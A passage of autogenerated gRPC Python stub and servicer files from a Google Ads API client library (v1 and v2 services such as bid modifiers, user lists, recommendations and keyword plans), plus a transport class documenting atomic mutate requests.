"""Returns the requested campaign bid modifier in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignBidModifiers(self, request, context):
"""Creates, updates, or removes campaign bid modifiers.
Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignBidModifierServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignBidModifier': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignBidModifier,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.GetCampaignBidModifierRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2.CampaignBidModifier.SerializeToString,
),
'MutateCampaignBidModifiers': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignBidModifiers,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CampaignBidModifierService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/customer_negative_criterion_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import customer_negative_criterion_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2
from google.ads.google_ads.v1.proto.services import customer_negative_criterion_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2
class CustomerNegativeCriterionServiceStub(object):
"""Proto file describing the Customer Negative Criterion service.
Service to manage customer negative criteria.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCustomerNegativeCriterion = channel.unary_unary(
'/google.ads.googleads.v1.services.CustomerNegativeCriterionService/GetCustomerNegativeCriterion',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.GetCustomerNegativeCriterionRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2.CustomerNegativeCriterion.FromString,
)
self.MutateCustomerNegativeCriteria = channel.unary_unary(
'/google.ads.googleads.v1.services.CustomerNegativeCriterionService/MutateCustomerNegativeCriteria',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaResponse.FromString,
)
class CustomerNegativeCriterionServiceServicer(object):
"""Proto file describing the Customer Negative Criterion service.
Service to manage customer negative criteria.
"""
def GetCustomerNegativeCriterion(self, request, context):
"""Returns the requested criterion in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCustomerNegativeCriteria(self, request, context):
"""Creates or removes criteria. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CustomerNegativeCriterionServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCustomerNegativeCriterion': grpc.unary_unary_rpc_method_handler(
servicer.GetCustomerNegativeCriterion,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.GetCustomerNegativeCriterionRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2.CustomerNegativeCriterion.SerializeToString,
),
'MutateCustomerNegativeCriteria': grpc.unary_unary_rpc_method_handler(
servicer.MutateCustomerNegativeCriteria,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CustomerNegativeCriterionService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/media_file_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import media_file_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2
from google.ads.google_ads.v1.proto.services import media_file_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2
class MediaFileServiceStub(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetMediaFile = channel.unary_unary(
'/google.ads.googleads.v1.services.MediaFileService/GetMediaFile',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.FromString,
)
self.MutateMediaFiles = channel.unary_unary(
'/google.ads.googleads.v1.services.MediaFileService/MutateMediaFiles',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.FromString,
)
class MediaFileServiceServicer(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def GetMediaFile(self, request, context):
"""Returns the requested media file in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateMediaFiles(self, request, context):
"""Creates media files. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MediaFileServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetMediaFile': grpc.unary_unary_rpc_method_handler(
servicer.GetMediaFile,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.SerializeToString,
),
'MutateMediaFiles': grpc.unary_unary_rpc_method_handler(
servicer.MutateMediaFiles,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.MediaFileService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/recommendation_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import recommendation_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2
from google.ads.google_ads.v1.proto.services import recommendation_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2
class RecommendationServiceStub(object):
"""Proto file describing the Recommendation service.
Service to manage recommendations.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/GetRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.GetRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2.Recommendation.FromString,
)
self.ApplyRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/ApplyRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationResponse.FromString,
)
self.DismissRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/DismissRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationResponse.FromString,
)
class RecommendationServiceServicer(object):
"""Proto file describing the Recommendation service.
Service to manage recommendations.
"""
def GetRecommendation(self, request, context):
"""Returns the requested recommendation in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ApplyRecommendation(self, request, context):
"""Applies given recommendations with corresponding apply parameters.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DismissRecommendation(self, request, context):
"""Dismisses given recommendations.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RecommendationServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.GetRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.GetRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2.Recommendation.SerializeToString,
),
'ApplyRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.ApplyRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationResponse.SerializeToString,
),
'DismissRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.DismissRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.RecommendationService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/shared_set_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import shared_set_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2
from google.ads.google_ads.v1.proto.services import shared_set_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2
class SharedSetServiceStub(object):
"""Proto file describing the Shared Set service.
Service to manage shared sets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetSharedSet = channel.unary_unary(
'/google.ads.googleads.v1.services.SharedSetService/GetSharedSet',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.GetSharedSetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2.SharedSet.FromString,
)
self.MutateSharedSets = channel.unary_unary(
'/google.ads.googleads.v1.services.SharedSetService/MutateSharedSets',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsResponse.FromString,
)
class SharedSetServiceServicer(object):
"""Proto file describing the Shared Set service.
Service to manage shared sets.
"""
def GetSharedSet(self, request, context):
"""Returns the requested shared set in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateSharedSets(self, request, context):
"""Creates, updates, or removes shared sets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SharedSetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetSharedSet': grpc.unary_unary_rpc_method_handler(
servicer.GetSharedSet,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.GetSharedSetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2.SharedSet.SerializeToString,
),
'MutateSharedSets': grpc.unary_unary_rpc_method_handler(
servicer.MutateSharedSets,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2.MutateSharedSetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.SharedSetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/user_list_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import user_list_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2
from google.ads.google_ads.v1.proto.services import user_list_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2
class UserListServiceStub(object):
"""Proto file describing the User List service.
Service to manage user lists.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetUserList = channel.unary_unary(
'/google.ads.googleads.v1.services.UserListService/GetUserList',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.GetUserListRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2.UserList.FromString,
)
self.MutateUserLists = channel.unary_unary(
'/google.ads.googleads.v1.services.UserListService/MutateUserLists',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsResponse.FromString,
)
class UserListServiceServicer(object):
"""Proto file describing the User List service.
Service to manage user lists.
"""
def GetUserList(self, request, context):
"""Returns the requested user list.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateUserLists(self, request, context):
"""Creates or updates user lists. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_UserListServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetUserList': grpc.unary_unary_rpc_method_handler(
servicer.GetUserList,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.GetUserListRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__list__pb2.UserList.SerializeToString,
),
'MutateUserLists': grpc.unary_unary_rpc_method_handler(
servicer.MutateUserLists,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_user__list__service__pb2.MutateUserListsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.UserListService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: services/transports/google_ads_service_grpc_transport.py
```python
import google.api_core.grpc_helpers
from google.ads.google_ads.v1.proto.services import google_ads_service_pb2_grpc
class GoogleAdsServiceGrpcTransport(object):
"""gRPC transport class providing stubs for
google.ads.googleads.v1.services GoogleAdsService API.
The transport provides access to the raw gRPC stubs,
which can be used to take advantage of advanced
features of gRPC.
"""
# The scopes needed to make gRPC calls to all of the methods defined
# in this service.
_OAUTH_SCOPES = ()
def __init__(self,
channel=None,
credentials=None,
address='googleads.googleapis.com:443'):
"""Instantiate the transport class.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
address (str): The address where the service is hosted.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments are mutually '
'exclusive.', )
# Create the channel.
if channel is None:
channel = self.create_channel(
address=address,
credentials=credentials,
)
self._channel = channel
# gRPC uses objects called "stubs" that are bound to the
# channel and provide a basic method for each RPC.
self._stubs = {
'google_ads_service_stub': google_ads_service_pb2_grpc.GoogleAdsServiceStub(channel),
}
@classmethod
def create_channel(
cls,
address='googleads.googleapis.com:443',
credentials=None,
**kwargs):
"""Create and return a gRPC channel object.
Args:
address (str): The host for the channel to use.
credentials (~.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
kwargs (dict): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return google.api_core.grpc_helpers.create_channel(
address,
credentials=credentials,
scopes=cls._OAUTH_SCOPES,
**kwargs
)
@property
def channel(self):
"""The gRPC channel used by the transport.
Returns:
grpc.Channel: A gRPC channel object.
"""
return self._channel
@property
def search(self):
"""Return the gRPC stub for :meth:`GoogleAdsServiceClient.search`.
Returns all rows that match the search query.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['google_ads_service_stub'].Search
@property
def mutate(self):
"""Return the gRPC stub for :meth:`GoogleAdsServiceClient.mutate`.
Creates, updates, or removes resources. This method supports atomic
transactions with multiple types of resources. For example, you can
atomically create a campaign and a campaign budget, or perform up to
thousands of mutates atomically.
This method is essentially a wrapper around a series of mutate methods.
The only features it offers over calling those methods directly are: -
Atomic transactions - Temp resource names (described below) - Somewhat
reduced latency over making a series of mutate calls.
Note: Only resources that support atomic transactions are included, so
this method can't replace all calls to individual services.
## Atomic Transaction Benefits
Atomicity makes error handling much easier. If you're making a series of
changes and one fails, it can leave your account in an inconsistent
state. With atomicity, you either reach the desired state directly, or
the request fails and you can retry.
## Temp Resource Names
Temp resource names are a special type of resource name used to create a
resource and reference that resource in the same request. For example,
if a campaign budget is created with 'resource\_name' equal to
'customers/123/campaignBudgets/-1', that resource name can be reused in
the 'Campaign.budget' field in the same request. That way, the two
resources are created and linked atomically.
To create a temp resource name, put a negative number in the part of the
name that the server would normally allocate.
Note: - Resources must be created with a temp name before the name can
be reused. For example, the previous CampaignBudget+Campaign example
would fail if the mutate order was reversed. - Temp names are not
remembered across requests. - There's no limit to the number of temp
names in a request. - Each temp name must use a unique negative number,
even if the resource types differ.
## Latency
It's important to group mutates by resource type or the request may time
out and fail. Latency is roughly equal to a series of calls to
individual mutate methods, where each change in resource type is a new
call. For example, mutating 10 campaigns then 10 ad groups is like 2
calls, while mutating 1 campaign, 1 ad group, 1 campaign, 1 ad group is
like 4 calls.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['google_ads_service_stub'].Mutate
```
#### File: proto/services/ad_group_bid_modifier_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import ad_group_bid_modifier_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2
from google.ads.google_ads.v2.proto.services import ad_group_bid_modifier_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2
class AdGroupBidModifierServiceStub(object):
"""Proto file describing the Ad Group Bid Modifier service.
Service to manage ad group bid modifiers.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetAdGroupBidModifier = channel.unary_unary(
'/google.ads.googleads.v2.services.AdGroupBidModifierService/GetAdGroupBidModifier',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.GetAdGroupBidModifierRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2.AdGroupBidModifier.FromString,
)
self.MutateAdGroupBidModifiers = channel.unary_unary(
'/google.ads.googleads.v2.services.AdGroupBidModifierService/MutateAdGroupBidModifiers',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersResponse.FromString,
)
class AdGroupBidModifierServiceServicer(object):
"""Proto file describing the Ad Group Bid Modifier service.
Service to manage ad group bid modifiers.
"""
def GetAdGroupBidModifier(self, request, context):
"""Returns the requested ad group bid modifier in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateAdGroupBidModifiers(self, request, context):
"""Creates, updates, or removes ad group bid modifiers.
Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AdGroupBidModifierServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetAdGroupBidModifier': grpc.unary_unary_rpc_method_handler(
servicer.GetAdGroupBidModifier,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.GetAdGroupBidModifierRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_ad__group__bid__modifier__pb2.AdGroupBidModifier.SerializeToString,
),
'MutateAdGroupBidModifiers': grpc.unary_unary_rpc_method_handler(
servicer.MutateAdGroupBidModifiers,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_ad__group__bid__modifier__service__pb2.MutateAdGroupBidModifiersResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.AdGroupBidModifierService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/campaign_extension_setting_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import campaign_extension_setting_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2
from google.ads.google_ads.v2.proto.services import campaign_extension_setting_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2
class CampaignExtensionSettingServiceStub(object):
"""Proto file describing the CampaignExtensionSetting service.
Service to manage campaign extension settings.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignExtensionSetting = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignExtensionSettingService/GetCampaignExtensionSetting',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.GetCampaignExtensionSettingRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2.CampaignExtensionSetting.FromString,
)
self.MutateCampaignExtensionSettings = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignExtensionSettingService/MutateCampaignExtensionSettings',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsResponse.FromString,
)
class CampaignExtensionSettingServiceServicer(object):
"""Proto file describing the CampaignExtensionSetting service.
Service to manage campaign extension settings.
"""
def GetCampaignExtensionSetting(self, request, context):
"""Returns the requested campaign extension setting in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignExtensionSettings(self, request, context):
"""Creates, updates, or removes campaign extension settings. Operation
statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignExtensionSettingServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignExtensionSetting': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignExtensionSetting,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.GetCampaignExtensionSettingRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__extension__setting__pb2.CampaignExtensionSetting.SerializeToString,
),
'MutateCampaignExtensionSettings': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignExtensionSettings,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__extension__setting__service__pb2.MutateCampaignExtensionSettingsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.CampaignExtensionSettingService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/distance_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import distance_view_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2
from google.ads.google_ads.v2.proto.services import distance_view_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2
class DistanceViewServiceStub(object):
"""Proto file describing the Distance View service.
Service to fetch distance views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetDistanceView = channel.unary_unary(
'/google.ads.googleads.v2.services.DistanceViewService/GetDistanceView',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2.GetDistanceViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2.DistanceView.FromString,
)
class DistanceViewServiceServicer(object):
"""Proto file describing the Distance View service.
Service to fetch distance views.
"""
def GetDistanceView(self, request, context):
"""Returns the attributes of the requested distance view.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DistanceViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetDistanceView': grpc.unary_unary_rpc_method_handler(
servicer.GetDistanceView,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_distance__view__service__pb2.GetDistanceViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_distance__view__pb2.DistanceView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.DistanceViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/keyword_plan_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v2.proto.resources import keyword_plan_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2
from google.ads.google_ads.v2.proto.services import keyword_plan_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2
class KeywordPlanServiceStub(object):
"""Proto file describing the keyword plan service.
Service to manage keyword plans.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetKeywordPlan = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/GetKeywordPlan',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.GetKeywordPlanRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_keyword__plan__pb2.KeywordPlan.FromString,
)
self.MutateKeywordPlans = channel.unary_unary(
'/google.ads.googleads.v2.services.KeywordPlanService/MutateKeywordPlans',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_keyword__plan__service__pb2.MutateKeywordPlansResponse.FromString,
)
self.GenerateForecastMetrics = channel.unary_unary(
